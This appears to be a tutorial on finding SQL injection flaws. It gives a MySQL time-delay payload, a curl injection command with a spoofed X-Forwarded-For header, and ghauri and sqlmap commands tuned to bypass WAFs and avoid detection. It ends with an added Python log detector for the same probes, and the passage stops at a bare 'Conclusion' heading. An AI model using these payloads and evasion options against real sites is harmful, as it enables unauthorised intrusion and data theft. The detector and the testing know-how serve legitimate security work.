
Sometimes, simple methods work best when hunting for SQL injection (SQLi) vulnerabilities. Here’s an optimized approach:
1. Extract Potential Targets
Use Wayback Machine URLs to find historical URLs with parameters:
waybackurls --dates target.com | grep '?id='
This helps identify pages that may still be vulnerable.
2. Test for Sleep-Based (Time-Based) SQLi
Use the following payload (MySQL-specific: SLEEP() and sysdate() are MySQL functions, so other database engines need their own delay primitive):
if(now()=sysdate(),SLEEP(8),0)
If the response is delayed by ~8 seconds, the parameter is likely injectable. Compare against a request without the payload, and repeat with a different SLEEP value, so that ordinary server latency is not mistaken for injection.
3. Manual Testing with cURL
curl -G "https://target.com/page.php" --data-urlencode "id=1' OR if(now()=sysdate(),SLEEP(8),0) -- -" -H "X-Forwarded-For: 127.0.0.1"
• -G makes cURL append the --data-urlencode value to the URL as the id query parameter; with -X GET the payload would be sent in a request body that page.php?id= never reads.
• The X-Forwarded-For header may help bypass basic IP-based WAF restrictions.
• Modify headers like User-Agent to mimic real traffic.
4. Automated Testing with Ghauri (Bypassing WAFs)
ghauri -u "https://target.com/page.php?id=1" --timeout=30 --delay=5 --technique=BEST --level=3 --prefix="/**/" --suffix="-- -" --safe-chars="[]" --random-agent --ignore-code=403
--timeout=30: Sets the request timeout to 30 seconds.
--delay=5: Adds a 5-second delay between requests to avoid detection.
--technique=BEST: Selects the injection techniques by letter: B (boolean-based), E (error-based), S (stacked queries), T (time-based).
--level=3: Performs more advanced tests for better detection.
--prefix="/**/": Adds a comment prefix to bypass WAF filters.
--suffix="-- -": Ends the payload with a SQL comment to evade detection.
--safe-chars="[]": Keeps the listed characters ([ and ]) from being URL-encoded.
--random-agent: Uses a random User-Agent to avoid fingerprinting.
--ignore-code=403: Ignores 403 Forbidden responses to continue scanning.
5. Advanced Testing with SQLMap
sqlmap -u "https://target.com/page.php?id=1" --batch --random-agent --tamper="between,space2comment,charencode" --timeout=15 --time-sec=8 --level=5 --risk=3
--random-agent: Uses random user-agents to avoid detection.
--tamper: Applies obfuscation techniques to evade WAFs.
--risk=3 --level=5: Enables deep scanning with advanced payloads.
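As an added example (not code from the original post), here is the other side of the same traffic: a small detector a defender can run over web server access logs to flag the probe styles described above, namely the MySQL time-delay payload, the /**/ comment and charencode obfuscations, the trailing SQL comment, a response time long enough to show the delay actually fired, and a loopback X-Forwarded-For value arriving from an external client. The log format and the sample lines are constructed for this example.

```python
import ipaddress
import re
from urllib.parse import unquote

# Constructed log format for this example (not any server's default):
# $remote_addr "$request" $status $request_time "$http_x_forwarded_for"
LOG_RE = re.compile(r'^(\S+) "(\S+) (\S+) [^"]*" (\d{3}) ([\d.]+) "([^"]*)"$')
# Delay primitives behind the payload above (MySQL) plus their common peers.
TIME_FUNCS = re.compile(r'\b(?:sleep|benchmark|pg_sleep)\s*\(|\bsysdate\s*\(\)|waitfor\s+delay', re.I)
COMMENT_TAIL = re.compile(r'(?:--\s*-?|#)$')
SLOW_SECONDS = 5.0  # the payload above sleeps for 8 s

def normalize(query):
    """Undo the obfuscations above: URL-encoding and /**/ comments used as spaces."""
    query = unquote(unquote(query))  # charencode tamper; second pass covers double encoding
    query = re.sub(r'/\*.*?\*/', ' ', query)  # space2comment tamper, --prefix="/**/"
    return re.sub(r'\s+', ' ', query).strip().lower()

def analyze(line):
    # Returns the signals found in one log line, or None if the line does not parse.
    m = LOG_RE.match(line)
    if not m:
        return None
    src, method, target, status, rtime, xff = m.groups()
    path, _, query = target.partition('?')
    norm = normalize(query)
    signals = []
    if TIME_FUNCS.search(norm):
        signals.append('time-based payload')
    if COMMENT_TAIL.search(norm):
        signals.append('comment terminator')
    if signals and float(rtime) >= SLOW_SECONDS:
        signals.append('slow response')  # the delay fired: the parameter is likely injectable
    try:  # loopback/private X-Forwarded-For from an external client is a spoof attempt
        hop = ipaddress.ip_address(xff.split(',')[0].strip())
        if hop.is_loopback or hop.is_private:
            signals.append('spoofed X-Forwarded-For')
    except ValueError:
        pass
    return {'src': src, 'method': method, 'path': path, 'signals': signals}

def scan(lines):
    # Only the parsed lines that carry at least one signal.
    return [h for h in map(analyze, lines) if h and h['signals']]

# Constructed sample traffic: one benign request and the three probe styles above.
SAMPLE_LOG = [
    '203.0.113.9 "GET /page.php?id=1 HTTP/1.1" 200 0.041 "-"',
    '203.0.113.9 "GET /page.php?id=1%27%20OR%20if(now()%3Dsysdate(),SLEEP(8),0)%20--%20- HTTP/1.1" 200 8.093 "127.0.0.1"',
    '203.0.113.9 "GET /page.php?id=1%27/**/OR/**/if(now()%3Dsysdate(),SLEEP(8),0)/**/--/**/- HTTP/1.1" 200 8.112 "-"',
    '203.0.113.9 "GET /page.php?id=%31%27%20%4F%52%20%53%4C%45%45%50%28%38%29%20%23 HTTP/1.1" 200 0.050 "-"',
]
```

Running scan(SAMPLE_LOG) drops the benign first line and reports the three probes, with the second one also carrying the slow-response and spoofed-header signals.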
Conclusion
